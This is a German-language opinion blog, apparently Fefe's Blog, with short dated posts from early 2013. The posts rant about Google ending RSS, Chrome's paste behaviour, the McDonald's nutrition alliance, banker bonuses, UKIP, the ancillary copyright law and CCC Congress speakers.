[l] Google hat erst ihren Online-RSS-Reader zugemacht, dann die RSS-Extension für Chrome entfernt. Offensichtlich will Google RSS loswerden. Überraschend finde ich, mit welchem Nachdruck und wie plötzlich das jetzt passiert. Das wirkt fast so, als sei da eine Patentklage anhängig und sie müssten schnell alles abschalten.
Meine Theorie ist, dass das der Versuch ist, den Leuten Google+ überzuhelfen.

Fri Mar 15 2013

[l] Wenn eine Gruppe schon "Bündnis für Verbraucherbildung" heißt, dann weiß man ja gleich, woher der Wind weht. Da hat irgendein inkompetenter Minister auf Druck von den Bürgern oder Ärzten oder weil es einen Skandal gab sinnlosen, bekloppten Aktionismus angekündigt, um endlich mal was "gegen das Übergewichtsproblem" oder so zu tun. Und die Wirtschaft hat dann schnell was von Selbstregulierung geblubbert und ein sinnloses, beklopptes "Bündnis" gegründet, das angeblich die Bürger "informieren" will. Und wenn alles wie üblich klappt, spring der Minister sofort auf und es gibt tolle Pressefotos mit den Lobbyisten und dem Minister und den Logos der Industrie.
Nahe dran? Entscheidet selbst.
Mcdonalds soll jetzt an Schulen die Kinder beraten, wie man sich richtig ernährt.
Mcdonalds.
An Schulen.
Die Kinder.
Wie man sich richtig ernährt.
Mcdonalds!!
Und die gute Frau Ministerin Aigner grinst debil in die Kamera.
Wer sich jetzt fragt, was ich gegen Mcdonalds habe, die seien doch noch harmlos, die auf Lebensmittel-Futures spekulierenden Banken seien doch viel schlimmer: Recht habt ihr. Die Banken sind natürlich auch in diesem Bündnis.
Wer ist da noch so? Edeka, Rewe, Tchibo. Das sind doch die, die an der Kasse immer Süßigkeiten hinstellen, in Augenhöhe für Kinder, damit die Kinder die Eltern anquengeln und noch ne schnelle Mark gemacht wird, nicht wahr? GENAU DIE RICHTIGEN, um die Bürger zur Ernährung zu beraten!1!!
Und die Metro. Denen gehört die Marke Real. Wofür machen die gerade Werbung? Oster-Süßwaren und Dr.Oetker-Produkte. Wie Arsch auf Eimer! (Danke, Erich)

Thu Mar 14 2013

[l] Ebay hat eine Studie gemacht, dass Adwords rausgeschmissenes Geld sind. Also erstmal nicht alle, aber die zum Firmennamen. Also DAMIT konnte ja wohl NIEMAND rechnen!1!! Sie sagen, dass das nur Leute anzieht, die eh nach dir gesucht haben und dich eh geklickt hätten.
Ihr werdet jetzt vermutlich ähnlich schockiert sein ob dieser bahnbrechenden Einsicht, aber lacht nicht: wir reden hier von Millionen, die Google mit solcher Sinnlos-Werbung einnimmt. Wenn die ganzen Idioten kapieren, was sie da für ein Geld sinnlos verplempern, dann könnte das echt ein Problem werden für Google.
Wobei glaube ich niemand ein Problem damit hat, wenn Ebay-Adwords weggehen. Hier macht sich jemand schön lustig. Ich klick ja gewohnheitsmäßig auf Ebay-Ads, damit die Geld verlieren. Hintergrund-Tab damit aufmachen und dann nach ein paar Sekunden wieder zumachen. Ich freu mich immer, wenn ich zur Profitminderung bei Ebay beitragen kann. Selbst wenn das dann zu Google fließt.

Wed Mar 13 2013

[l] Was ist bloß in den Vollpfosten von Chrome vorgegangen, dass sie Copy+Paste kaputtgemacht haben?
Meine Nummer 1 Anwendung von Chrome ist, dass ich in einem xterm ne URL habe, die markiere, und das dann mit der mittleren Maustaste in Chrome paste.
Geht nicht mehr.
Weil irgendein elender Marodeur entschieden hat, dass Chrome nur noch Paste ala Ctrl-V entgegennimmt, und die mittlere Maustaste nicht wie in allen anderen X-Anwendungen pasten soll, sondern als hätte man Ctrl-V getippt.
Und puff, weg mit Chrome. Zurück zu Firefox. Nervig genug, dass sie nie URL-Paste mit dem mittleren Mausknopf in dem HTML-Bereich implementiert haben.
Update: Die letzte Zeile bezog sich auf Chrome, nicht Firefox. Lest doch mal ordentlich vor den Mailen bitte!
Und die Terminologie ist da bei X krude. Middlere Maustaste benutzt nicht Cut&Paste sondern der Mechanismus heißt "Selection". Das unterstützt Chrome jetzt nicht mehr.
Update: Aha, geht doch in Chrome, aber man muss mit der mittleren Maustaste auf das favicon klicken. Wissenschon, das winzige Icon. Ein Hoch auf offensichtliche Benutzerführung. Dann wird die URL auch direkt geladen. Wer (wie ich) URLs häufig umgebrochen kriegt in Mails und in Teilen pasten wollte, hat bei Chrome verloren. Ich bleibe bei der Rückmigration zu Firefox.
Update: Wo ich gerade beim über Chrome ranten war: die haben Pasten auch in die Gegenrichtung kaputtgemacht. Im Chrome was markieren, im xterm daneben pasten — kommt als UTF8 an, egal ob das xterm im UTF8-Modus ist oder (wie bei mir gerne mal) nicht. So kamen in letzter Zeit diverse kaputte Umlaute im Blog zustande. Chrome war Schuld. Früher ging das mal.
Update: Das Chrome-Update von heute kann auch wieder Mittelklick im URL-Balken.

Mon Mar 11 2013

[l] In den USA gibt es eine Firma, die Verkehrsüberwachungskameras aufstellt und betreibt und dafür 40% der Einnahmen von erwischten Rasern kassiert. Die sind wenigstens ehrlich mit ihren Geschäftsmodellen!
Ein Richter hat das jetzt in einem Fall gestoppt, wo ein Dorf von ca 2000 Einwohnern so einen Deal gemacht hat, und damit seit September 6600 Tickets rausgehauen hat.

Tue Mar 5 2013

[l] Ich hatte da die Tage eine Debatte drüber und diese Frage blieb offen. Suche dazu Theorien. Zum Congress lädt der CCC jedes Jahr explizit Frauen ein, erweitert das Themenspektrum, und wenn Frauen was einreichen, werden sie auch im Allgemeinen besonders wohlwollend wahrgenommen bis bevorzugt genommen. Man sollte denken, der Congress sei dann eine Oase aus coolen Hacker-Vorträgen von Frauen. Und die haben wir auch. Gelegentlich mal einen. Oder zwei. Gut, auch von den Männern kommt in letzter Zeit immer weniger cooles Zeug. Aber wenn man sich die Verteilung der Themen bei den Männer-Einreichungen und den Frauen-Einreichungen anguckt, dann kommen von Frauen im Allgemeinen (wenn nicht sogar: fast ausschließlich) so Meta-Community-Soziologie-Themen. Wieso ist das so?
Wir haben auch Männer-Vorträge über depressive Hacker und Hackerspaces. Solche Themen sind nicht per se schlecht.
Aber wieso melden sich auf so einen Call for Papers nicht mehr von den Frauen, die coole Dinge tun. Also Dinge, die sich Männer in dem jeweiligen (technischen!) Fachbereich angucken und sagen: Respekt! Nicht Respekt im Sinne von "Hast du aber fein gemacht, das schnuckelige Python-Skriptchen *tätschel*" sondern Respekt im Sinne von "Whoa, in der Forschungsgruppe wäre ich auch gerne gewesen, dann wäre vielleicht ein bisschen von der Coolness an mir hängen geblieben". Wieso gibt es sowas so selten?
Auch von Männern gibt es solche Hammer-Vorträge viel zu selten. Aber wir hätten genug Platz für alle Frauen und alle Männer mit Hammer-Vorträgen. Und wenn wir ihn nicht hätten, würde ich sagen: Scheiß auf die Männer, die hatten ihre Chance.
Wo bleiben die Frauen mit den Hammer-Vorträgen?
Im vertraulichen Gespräch kommen von Frauen dann gerne so Ausreden wie "ich trau mich nicht" oder "die Forschung war noch nicht so weit" oder "ich inszeniere mich halt nicht gerne". Lasse ich alles nicht gelten. Männlichen Nerds geht das genauso. Fast keiner ist zum Redner geboren, und ich konnte bisher beobachten, dass sich "kann reden" und "hat was zu sagen" in der Praxis im Allgemeinen gegenseitig ausschließt.
Also, liebe Community. Erklärt mir das mal. Was muss man machen, damit die Frauen kommen und ihren coolen Scheiß vortragen?
Wer keine Antwort hat aber trotzdem helfen will, kann mir auch mal erklären, wieso es generell weniger Hammer-Vorträge gibt in letzter Zeit. Oder ist das nur mein Eindruck und er täuscht?
Update: Die Statistik-Erklärung, die jetzt einige bringen, liegt natürlich auf der Hand. Gibt weniger Techie-Frauen, also gibt es auch weniger mit Hammer-Vorträgen. Das andere Argument ist die Sozialisierung. Gegen die Statistik kann ich nichts sagen, das stimmt natürlich. Die Hoffnung war, dass wenn wir ein-zwei Hammervorträge anziehen können, dass das dann als Vorbild dient und mehr Frauen zu Hammervorträgen animiert. Das funktioniert entweder nicht oder so langsam, dass das positive Feedback nicht in ausreichendem Maß bei uns ankommt. Also bei mir. Die anderen sehen das möglicherweise anders.
Das mit der Sozialisierung glaube ich nicht. Frauen werden nicht alle zu Prinzesschen erzogen. Ich sah da vor ner Weile eine Dokumentation zu, wo sie recht klar herausgearbeitet haben, dass das mit der Pubertät anfängt, dass Frauen zurückhaltender werden und sich nicht mehr an "Männerkram" rantrauen. Die Prinzessin-Phase ist aber eher davor, oder nicht? Im Übrigen wollen wir das ja gerade bekämpfen, indem wir gezielt Vorbilder-Vorträge wie auf dem 29c3 den mit den Tamagotchis oder den "weird machines"-Vortrag reinnehmen. Wieso funktioniert das nur so wenig / langsam?
Update: Interessante These: Vortragsauswahl anonymisiert machen und das auch offen so ansagen. Die Behauptung ist, dass Frauen deshalb nicht kommen, weil sie keinen Bock haben, wegen ihres Geschlechts reinzukommen, als Quotenfrau, oder dass das auch nur so aussieht. Ich kann mir nicht vorstellen, dass die Qualität nicht leidet, wenn man sich das Bewertungsinstrument des Feedbacks zu früheren Vorträgen aus der Hand nimmt. Aber vielleicht käme das mal auf einen Versuch an.
Update: Nachdem hier einige Berufsempörte aufschlugen und sich an dem "An Sozialisierung glaube ich nicht" aufhängen: Ich glaube da deshalb nicht dran, weil daraus folgen würde, dass wir eh verloren haben und unsere Bemühungen einstellen können. Wenn die Frauen von "der Gesellschaft" halt so sozialisiert sind, dass die nicht hacken wollen, dann sind unsere Bemühungen eh vergebens und zum Scheitern verurteilt. Dann können wir höchstens parallel einen Strickwettbewerb ausschreiben, wenn wir mehr Frauen anziehen wollen. Nein, das akzeptiere ich (noch) nicht.

Mon Mar 4 2013

[l] Beim Online-Banking hat man es ja so häufig mit Vollversagern zu tun, da ist es schön, mal jemanden zu sehen, der das professionell macht. Wo man so richtig sehen kann, wie sich da jemand Gedanken gemacht hat. Wells Fargo zeigt, wie sowas aussehen kann. BWAHAHAHAHAHAHA
Update: Macht mal View Source. Das sind zwei animated GIFs. Eines für den Fortschrittsbalken und eines für die "Schritte". (Danke, Kristian)

Fri Mar 1 2013

[l] In England gab es neulich diesen Kabinettsminister, der zurücktreten musste, weil er vor Gericht gelogen hatte. Es ging darum, dass der vor 10 Jahren zu schnell gefahren war, aber sein Punktekonto schon fast voll war, und er das daher seiner Frau untergeschoben hat. Das kam raus, und er musste dann gehen. Der hat nicht nur seinen Ministerposten verloren, sondern in dem Wahlkreis wurde jetzt auch neugewählt. Der Minister war von dem Juniorpartner in der Regierungskoalition, den Liberal Democrats. Das Wahlsystem in England ist nicht mit unserem vergleichbar, sonst hätte ich einen FDP-Vergleich gezogen. Die Briten haben eine Winner-Takes-All-Wahl, wo in jedem Wahlkreis der dortige Gewinner komplett über die Stimmen aus dem Wahlkreis entscheidet, kein Proporz-System. Die Neuwahl war gestern, gewonnen haben wieder die Lib Dems. Das sah lange aus, als sei es am Wackeln gewesen, aber nicht wegen den Konservativen oder gar Labour, sondern wegen UKIP, von denen man in Deutschland noch nicht viel gehört hat. UKIP steht für UK Independence Party, die treten für den EU-Austritt ein und nennen sich libertär, verhalten sich aber wie die meisten "Libertären" latent rechtsradikal. Wikipedia nennt sie rechtspopulistisch. Ihr Vorsitzender ist ein schmieriger Widerling namens Nigel Farage. Wenn ihr mal ein Wochenende Zeit habt, könnt ihr dem ja mal ein bisschen hinterhergoogeln.
Ich blogge das deshalb, weil das in England ungefähr so betrachtet wird, wie bei uns "die Niedersachsen-Wahl" betrachtet wird, als Indikator für die Stimmung im Lande. Die Konservativen sind eh eher unpopulär gerade und werden wohl nicht wiedergewählt werden, und jetzt haben sie es in der Wahl nicht mal auf den 3. Platz geschafft. Das ist zwar nur symbolisch, weil auch der 2. Platz nicht geholfen hätte, aber UKIP muss man langsam als ernsthaften politischen Player bewerten und sich mit denen auseinandersetzen, fürchte ich. Dieser Nigel Farage sitzt übrigens auch im EU-Parlament und sorgt dort nach Kräften für Eklats, wo er nur kann. Ich glaube, man beschreibt die am besten als britische Version von Jörg Haider und seinen Mitstreitern damals in Österreich.
Die Forderungen der UKIP könnt ihr euch bei der Wikipedia angucken.
Die Wahl war seit einer Woche in den Medien als eine Art Schicksalswahl begleitet und aufgewertet worden, trotzdem gab es nur eine Wahlbeteiligung von ca 50%. Bei der letzten Wahl waren es noch 70%.
Es ist recht unterhaltsam, sich die Kommentare gerade durchzulesen, die wie üblich nach solchen Wahlen anfangs relativ ungefiltert sind. So schiebt ein Tory-Abgeordneter das schlechte Abschneiden der Konservativen in der Wahl auf die Schwulenehe. Die Konservativen hatten übrigens vor der Wahl noch darüber diskutiert, ob sie nicht schnell ein paar fiese Anti-Ausländer-Aktionen starten sollen, um UKIP den Wind aus den Segeln zu nehmen. Haben sie am Ende aber nicht gemacht, nur ein bisschen Polit-Blablah ala "wir haben viele wichtige Maßnahmen auf den Weg gebracht". Der Guardian-Kommentator findet auch, dass UKIP der wichtigste Punkt an dieser Wahl ist.

Thu Feb 28 2013

[l] Es geschehen noch Zeichen und Wunder: Die EU hat ein Limit auf Banker-Boni beschlossen. Die Boni dürfen nur noch ungefähr so hoch wie das Gehalt sein, wenn die Mehrheit der Aktionäre zustimmen auch doppelt so hoch. Diese Regelung ist im Wesentlichen ein "EU gegen UK"-Ding, denn die Wirtschaft der Briten besteht nur noch aus den Zockerbanken in Canary Wharf. Die Briten haben die ganze Krise über schon mit Händen und Füßen gegen Bankregulierung gekämpft. Und natürlich hat Cameron auch gleich Widerstand angekündigt.
Ich persönlich würde mir da jetzt keine großen Illusionen machen. Dann erhöht man eben die Gehälter. Oder zahlt die Boni irgendwie anders aus, Aktien vielleicht, oder Optionen auf Aktien. Möglicherweise irgendwelche bizarren Kontroll-Deals für Investments anderer. Ich würde sogar denken, dass die das aus Steuergründen eh schon so machen. Und der Rest ist jetzt halt Theater, damit die EU-Politiker zuhause Erfolg reklamieren können, und damit Cameron jetzt laut lärmend Widerstand machen kann, und dann "ich habe für euch gekämpft" im Wahlkampf proklamieren kann.
Übrigens, wo wir gerade bei Banken waren: RBS hat heute einen Verlust für 2012 von 5.2 Milliarden Pfund bekanntgegeben. Die Bank ist seit 2008 verstaatlicht.
Much of the pre-tax loss came from a £4.6bn accounting charge for changes in the value of its own credit, which is a measure of how much it would cost to buy back its own liabilities.
Wenn man das und die ganzen Strafzahlugen für Libor und co abzieht, hätten sie sogar massiv Profit gemacht. 4 Milliarden, wenn ich das vorhin richtig gehört habe im Radio.
Update: Habe mich gerade mit jemandem unterhalten, der man bei Barclays gearbeitet hat. Der meinte, die Top 10% hätten da Boni gekriegt, und zwar bis zu 20% ihres Jahresgehaltes. Und wir reden hier von einem EU-Limit auf 100% des Jahresgehaltes.
Spannenderweise erzählt der mir auch, dass die Top Earner die höchsten Boni gekriegt haben (klar, wenn das in Prozent zum Gehalt ist), aber die nie im Vorstand gewesen seien, weil für den Vorstand das Gehalt offengelegt werden muss.
[l] Die Merkel-Junta hat das neue "Kontrollgesetz" für Hochfrequenztrading weitgehend filettiert. 500 Millisekunden Vorratsdatenspeicherung waren denen zu viel. Das können wir ja ab jetzt mal festhalten, wenn die Verhandlungen zur nächsten Iteration der Vorratsdatenspeicherung ins Eingemachte gehen.
Bei unseren Daten sind Monate bis Jahre auf dem Tisch, aber bei den Tradern, die mehrere Börsencrashes verursacht haben, nicht mal 500 ms?!
Update: Weil hier so viele Beamtenkinder aufschlagen und darauf bestehen, dass sich die 500 ms auf die Haltedauer der Papiere beziehen und nicht auf die Länge der Speicherung: ja, aber das macht mir den Witz kaputt. Die Alternativen ala "Low Ping Bastards haben sich durchgesetzt" finde ich weniger witzig. Falls Jemandem was Schönes einfällt, …

Wed Feb 27 2013

[l] Markus Kompa hat einen launigen Artikel zum Luxemburger Geheimdienstskandal gemacht. Wie, von dem habt ihr noch nichts gehört? Na dann hopp, lest euch das durch!
[l] Noch ein Nachschlag zu dem Grillo in Italien. Der Guardian hat sich mal die Abgeordneten von M5S angeguckt. Und wisst ihr was? Das sind junge, gebildete Frauen, die die Welt verbessern wollen. Der Kontrast zu den schmierigen Widerlingen, die sonst so im Parlament sind, könnte kaum größer sein. Wer mal in Italien ferngesehen hat, wird gesehen haben, was für eine frauenfeindliche Kultur die da haben, lauter großtittite Blondinen im Fernsehen, Frauen sind da fürs gut Aussehen zuständig, alle tatsächlichen Arbeiten werden von Männern gemacht. Berlusconis Bunga-Bunga-Kram war kein Einzelfall, das ist da Kultur. Die eine bekannte Abgeordnete im italienischen Parlament ist eine Pornodarstellerin, die sich bei ihren Reden gerne mal entblößt hat.
Wenn man sich im Vergleich die Abgeordneten von M5S anguckt, stellt sich bei mir das Gefühl ein, dass es für Italien doch noch Hoffnung geben könnte.
Leider haben die natürlich alle keinerlei politische Erfahrung und werden sich einarbeiten müssen. Vermutlich wird das Establishment alles tun, um die wegzumobben. Hoffentlich halten die durch.
(Wieso sie da im Online-Guardian ein Bild von Beppo bringen und nicht von den Frauen, um die es geht, … unklar. Im Print-Guardian ist auch ein Foto einer Abgeordneten. Immerhin eines.)
[l] Neue Gema-Tarife sollen die Clubs entlasten — indem sie die DJs belasten. Die sollen jetzt pro Track blechen. Und weil die ja bekanntlich im Geld schwimmen, trifft das endlich mal die richtigen, nämlich die fiesen Geldsäcke in der Verwertungskette!1!! Immerhin zahlen die DJs pro Track in ihrem Repertoire, nicht pro Aufführung des Tracks. Wie uncharakteristisch großzügig von der Gema. Außer man hat ein großes Repertoire, dann hat man natürlich verkackt. D.h. die echten Künstler werden bestraft, die Möchtegerns belohnt. (Danke, Martin)

Tue Feb 26 2013

[l] Dieses Leistungsschutzrecht ist für mich ein Aha-Moment. Gar nicht wie die das durchzuprügeln versuchen, wie inkompetent der Entwurf gemacht ist, was das alles für eine elende Korruption ist, nein, das erwarte ich von einer Schwarz-Geld-Regierung nicht anders. Solange diese Leute an der Macht sind, wird das immer so sein.
Was mich aber wirklich erschüttert ist, wie die Presse gerade geschlossen ihrem Auftrag zur Berichterstattung nicht nachkommt. Bei Stefan Niggemeier im Blog gibt es gerade mal wieder einen Artikel dazu. Seit Wochen geht das jetzt so. Was ist denn mit der redaktionellen Unabhängigkeit? Wir sollen denen glauben, dass die monetären Anforderungen des Verlegers keine Rolle spielen, wenn es darum geht, ob geschaltete Werbung Einfluss auf den redaktionellen Inhalt hat, wenn es bei der Berichterstattung über das Leistungsschutzrecht — oder besser bei der fehlenden Berichterstattung über das Leistungsschutzrecht so dermaßen offensichtlich eine geradezu totale Ausblendung der Realität aus der Berichterstattung gibt?! Keiner traut sich, da mal beide Seiten zu beleuchten? Es gibt überall entweder gar nichts oder fiese Meinungsmache-Op-Eds!
Ich habe mir nie groß Illusionen gemacht, wie das in unserer Presse abgeht, aber ich hätte gedacht, dass die zumindest den Anschein zu erwecken bemüht sein würden, dass es sich nicht um eine gleichgeschaltete und den Verlegerinteressen untergeordnete Klientel-Presse handelt.
Das ist für mich eine erschütternde Einsicht. Wenn es wirklich um die Wurst geht, dann ist auf niemanden von der Presse Verlass? Nicht einmal aus den falschen Motiven heraus simuliert jemand halbherzig Unabhängigkeit?! Wow.

Mon Feb 25 2013

[l] Altmaier redet sich um Kopf und Kragen. Der war doch mal die Hoffnung der CDU, weil er nicht so verkalkt wie der Rest der Überzeugungstäter in der CDU schien. Und weil er die Piraten nassgemacht hat, als die noch wie eine Option aussahen. Und jetzt? Jetzt hat er zivilen Ungehorsam als Instrument verurteilt, weil es für Auseinandersetzungen ja Gerichte gäbe. Darauf angesprochen, dass ziviler Ungehorsam ja Indien befreit und die Rassentrennung in den USA besiegt habe, erklärt er, dass das ja damals keine Rechtsstaaten gewesen seien. Im Gegensatz zu uns jetzt, meint er offenbar.

Thu Feb 21 2013

[l] Das muss echt unglaublich schwierig sein, ordentliche Ohrstöpsel-Kopfhörer zu bauen. Ich hatte früher welche von Sony, aber die zerfielen spätestens nach einem halben Jahr, konnte man die Uhr nach stellen. Die fühlten sind an wie darauf optimiert, Verschleiß-Material zu sein, das man alle Nase lang ersetzen muss. Also kein Sony mehr.
Dann hab ich welche von Philips gekauft. Die waren gut, die hatten sogar an dem einen Stöpsel eine fühlbare Markierung, damit man auch im Dunkeln erfühlen kann, welcher für links und welcher für rechts ist. Klangen auch gut, waren solide, aber habe ich leider letztes Wochenende irgendwo liegen lassen. Mist.
Also habe ich einen Impulskauf bei Amazon gemacht und mir ein Paar von Skullcandy geordert. Die haben überhaupt keine Markierung, welcher links und welcher rechts ist. Nicht mal nur visuell. Gar nichts. Zu meiner Verteidigung: es war ein Impulskauf, Amazon sagte "wenn Sie in den nächsten 14 Minuten ordern, geht es heute noch raus", ich war unter Zeitdruck!1!!
Das nächste Paar wird wieder Philips.

Wed Feb 20 2013

[l] Nachschlag zu der Polizei München, die Opfer der Kampagne, wissenschon. Nun, erinnert ihr euch noch an die gefesselte Frau, die die Polizei krankenhausreif geprügelt hat? Die mit dem beeindruckenden Foto? Ja? Bei der gab es eine Hausdurchsuchung um 6 Uhr früh, um das Handy zu beschlagnahmen. Das Handy, mit dem das besagte Foto gemacht wurde. Oh und sie haben eine Haarprobe genommen, um der Frau Drogenkonsum anzuhängen. Denn wer Drogen nimmt, ist weniger glaubwürdig. Das sagt die Staatsanwaltschaft auch ganz knallhart so an.
„Uns geht es um ihre Glaubwürdigkeit und ihre Schuldfähigkeit. Haarproben werden immer unangemeldet genommen.“
Na klar, liebe Staatsanwaltschaft, euch geht es um die Schuldfähigkeit! Ihr versucht die Frau zu entlasten! Warum glaubt euch das nur gerade keiner… (Achtung: Link geht zur "Bild") (Danke, Twister)

Thu Feb 14 2013

[l] Wo kommt eigentlich das Mem her, dass die Schwavan so eine kompetente Politikerin gewesen sein soll? Die Frau hat die zwei größten Schäden für unser Bildungssystem in der Nachkriegsgeschichte zu verantworten: Die Schulzeitkürzung auf 12 Jahre und das Pasta-System für Unis. Als ich zur Schule ging, war vormittags Schule und nachmittags war Hausaufgaben. Heute ist Ganztagsschule. Weil die Spezialexperten nur die Schulzeit gekürzt haben, nicht das Kurrikulum.
Und die Unis pumpen jetzt lauter arbeitslose Arbeitsmarktopfer mit McDiplom raus. In der Industrie gelten diese Plastikabschlüsse nichts, aber die meckern darüber nicht so laut, weil sie solchen Leuten auch weniger Gehalt zahlen können als Bewerbern mit echtem Abschluss. Ich fand das ja in den USA immer den Brüller, wenn die Leute da ein halbes Vordiplom als "Uni-Abschluss" betrachtet haben. Mehr kann man sich da halt nicht leisten, so teuer wie Unis sind. Oh ach ja, und die Studiengebühren wurden auch unter Schavan eingeführt.
Aus meiner Sicht ist es völlig unbegreiflich, wieso diese Frau jetzt auch noch gefeiert wird. Alle Kommentatoren betonen, was für eine gute Politikerin die gewesen sein soll, aber keiner kann auch nur ein Beispiel nennen.
Wer noch ein bisschen schlechte Laune auf den Rant obendrauf haben will, kann sich ja mal dieses Op-Ed in der New York Times durchlesen, geschrieben von einer Frau, die sonst für den Tagesspiegel schreibt. Und die bei der NYT offensichtlich mal so richtig die Sau rauslassen zu können glaubt. Die Deutschen mit ihren Uni-Abschlüssen immer, ist doch alles total wertlos! Wer braucht schon Leute, die sich mit irgendwas auskennen! Völlig überqualifiziert für die Temp-McJobs, die unsere Politik mit Hartz IV und co eingeführt hat. Die ein-zwei fähigen Leute kann man auch aus dem Ausland einstellen, die organisieren dann das Schlachthaus, und den Rest der Arbeit machen "geringfügig Beschäftigte" und der Steuerzahler zahlt auch noch das Gehalt. Ganz groß haben wir das gemacht mit der Bildung in Deutschland! Da können wir echt stolz drauf sein! Ein Glück, dass wir die Schavan hatten, sonst hätte das noch schlimmer ausgehen können!1!! Wie viel schlimmer hätte das eigentlich konkret aussehen können?
Update: Oh ja, für die Föderalismusreform 2006 war sie auch zuständig. Und hat das inzwischen auch als Fehler erkannt. Was auch daran liegen mag, dass sie damit ihr eigenes Amt überflüssig gemacht hat. Eine echte Spezialexpertin, diese Frau Schavan!
Update: Oh, schau, die Nachdenkseiten sehen das ähnlich.

Fri Feb 8 2013

[l] Und wieder hat ein Landgericht eine wunderschöne Gelegenheit verstreichen lassen, einen Massenabmahner abblitzen zu lassen. Money Quote:
Das Gericht sieht die kleine IT-Firma aus Regenstauf zwar als Vielfachabmahner, schließlich habe das Unternehmen über 180 Abmahnungen binnen einer Woche verschickt. Aber das allein rechtfertige nicht die Schlussfolgerung, dass es sich um Missbrauch handele. Schließlich würden Behörden solche Wettbewerbsverstöße nicht verfolgen. Die "Abmahntätigkeit der Wettbewerber ist daher systemimmanent", heißt es in dem Urteil.
Nee klar. Nicht auszudenken, was für einen immensen wettbewerblichen Vorteil sich die Abgemahnten beschafft haben, indem sie auf Facebook kein Impressum hatten! Da rollten die Millionen an unethisch erlangten Profiten nur so rein!1!!
Der größte Lacher an der Geschichte ist aber das Detail, dass das Gericht sich die abgemahnten Facebook-Seiten nicht angeguckt hat. Warum?
"Ein im Termin versuchter Augenschein auf der Facebook-Seite konnte mangels Zugriff auf diese Seite von dem amtlichen PC aus nicht durchgeführt werden."
Weil Facebook im Amt gesperrt war! (Danke, Lutz)
[l] Lacher des Tages: Nach einem Kommentar zur Iran-Drohnen-Story gefragt, antwortete die Bundeswehr so:
Die größte Drohne in Diensten der Bundeswehr ist die "Heron" des israelischen Herstellers IAI. Ob sie Beobachtungsdaten an Bord speichert, konnte ein Sprecher der Bundeswehr in Köln am Donnerstag zunächst nicht beantworten: Es sei Karneval.
Wieso haben wir die Bundeswehr eigentlich noch nicht zugemacht? Es hängt ja wohl niemand der Annahme an, dass die uns im Krisenfall verteidigen würden? Das muss der gleiche Grund sein, aus dem auch der "Verfassungsschutz" noch existiert. (Danke, Uwe)
[l] Hier kommen jetzt Mails von Wissenschaftlern rein, die sich verunglimpft fühlen von meiner Warnung gestern. Daher werde ich das noch ein bisschen ausführen.
Argument 1: das sind nur einige schwarze Schafe, die sich von den Bösen finanzieren lassen. Ich bin ein seriöser Forscher, mir geht es um die Erleuchtung.
Antwort: Es spielt keine Rolle, ob du für deine Strukturausforschung von denen bezahlt wirst oder nicht. Das Ergebnis deiner Arbeit wird veröffentlicht werden und steht denen am Ende zur Verfügung.
Argument 2: Wenn ich das nicht tue, der ich Sensibilität für die Szene habe, dann wird das irgendein Depp machen, der wird dann noch viel mehr Schaden anrichten.
Antwort: Wenn du annimmst, dass die Leute wegen meiner Warnung nicht mit dir reden, wieso sollten die dann mit dem Depp reden? Im Übrigen sei an der Stelle Joseph Weizenbaum zitiert, der auf dieses "Argument" antwortete, indem er es auf Vergewaltigungen anwendete. Die gäb es ja auch, da könnte man sich ja auch nicht mit "wenn ich es nicht mache, macht es jemand anderes" das Gewissen reinreden.
Argument 3: Wenn ihr uns nicht an euch ranlasst, dann werden die Arbeiten aus wilder Spekulation bestehen, und dann endet das für euch noch schlechter.
Antwort: Das ist kein Argument sondern ein Erpressungsversuch.
Ich möchte außerdem darauf hinweisen, dass das "wenn ich es nicht mache, macht es jemand anderes, und der ist weniger lieb als ich"-Argument die klassische Verteidigung von KZ-Wächtern und Soldaten ist. Im Übrigen kann man gerade beim BKA sehen, dass sich nicht unbedingt ein anderer findet *hust*
Versteht bitte, liebe Wissenschaftler, dass der CCC sich nicht nur die Wahlcomputerindustrie zum Feind gemacht hat, sondern wir auch die Trojaner-Fraktion der Sicherheitsbehörden geärgert haben. Und beim CCC sind schon zwei Hacker unter mysteriösen Umständen ums Leben gekommen über die Jahre. Für euch mag das nicht offensichtlich sein, aber es geht hier um Selbstschutz und möglicherweise auch um Menschenleben. Aus meiner Sicht ist das vergleichbar mit einer Naturdokumentation im Dschungel von Afrika. Die findet auch nur dann statt, wenn das Kamerateam nicht die gefilmten Tiere durch das Drehen der Dokumentation in Gefahr bringt. Wenn ihr Wissenschaftler nicht selbst darauf kommt, dass eure Forschung möglicherweise andere in Gefahr bringen könnte, oder zumindest die gesellschaftliche Arbeit des CCC behindern kann, dann ist es gut, dass ich vor euch gewarnt habe.
Wieso macht eigentlich keiner von euch eine Strukturausforschung über BP? Oh, was sagt ihr, die lassen euch nicht rein? Na sowas. Warum wohl?

Thu Feb 7 2013

[l] Endlich hat auch Deutschland eine Birther-Bewegung: Der Rösler als Vizekanzler geht nicht, der ist Vietnamese!1!!
Von den Rechtsradikalen der CDU lernen heißt siegen lernen, werden die sich da in der FDP gedacht haben.
Update: Wisst ihr eigentlich, was der Hahn noch so macht, wenn er nicht FDP-Chef in Hessen ist? Er ist … Integrationsminister.
Update: Im Original lesen sich die Bemerkungen nicht sonderlich rassistisch. Da sind wir wohl auf ein SPD-Wahlkampf-Empörungsuboot reingefallen.
[l] In letzter Zeit gibt es eine auffällige Häufung von Befragungen und wissenschaftlichen Studien zu Hackern und Piraten, wie die Szene funktioniert und so weiter, auch bei Hackerspaces und insbesondere auch bei Gruppen wie Occupy und co. Wenn so jemand bei euch anklopft, sagt ihm bitte nichts. Nur weil die freundlich und nett wirken, muss man noch nicht kooperieren.
Nanu, hat der Fefe was gegen Wissenschaft? Nein. Aber was die meisten nicht auf dem Radar haben: Solche "Studien" werden von den Bösen gemacht. Dahinter stecken Public Relations Consulting-Firmen, Risk-Management-Firmen, Politikberatung, Thinktanks. Die haben Angst vor uns und wollen uns ausforschen. Und wie macht man das? Man schickt unverdächtige V-Leute. In diesem Fall nerdige Wissenschaftler, die freundlich anfragen.
Falls das jemand für paranoide Wahnvorstellungen hält, habe ich mal ein aktuelles Beispiel: BP lässt Bürgerproteste untersuchen. Haben die den Bürgern gesagt, dass das BP ist? Nein. Sie haben das "Göttinger Institut für Demokratieforschung" geschickt. Wer würde hinter so einem ehrbar klingenden Namen die Umweltzerstörungsindustrie erwarten? Siehste mal.
Und auch BP versucht das natürlich schönzureden. Hier ist wie sie ihre Ziele formuliert haben:
Ziel der Untersuchung war es herauszufinden, welche Einstellungen und Motivlagen in typischen Gruppen engagierter Bürgerinnen und Bürger vorherrschen. Dazu gehörten auch die Einstellungen der Aktivisten gegenüber Unternehmen, soweit es um deren Mitwirkung an Infrastrukturprojekten geht.
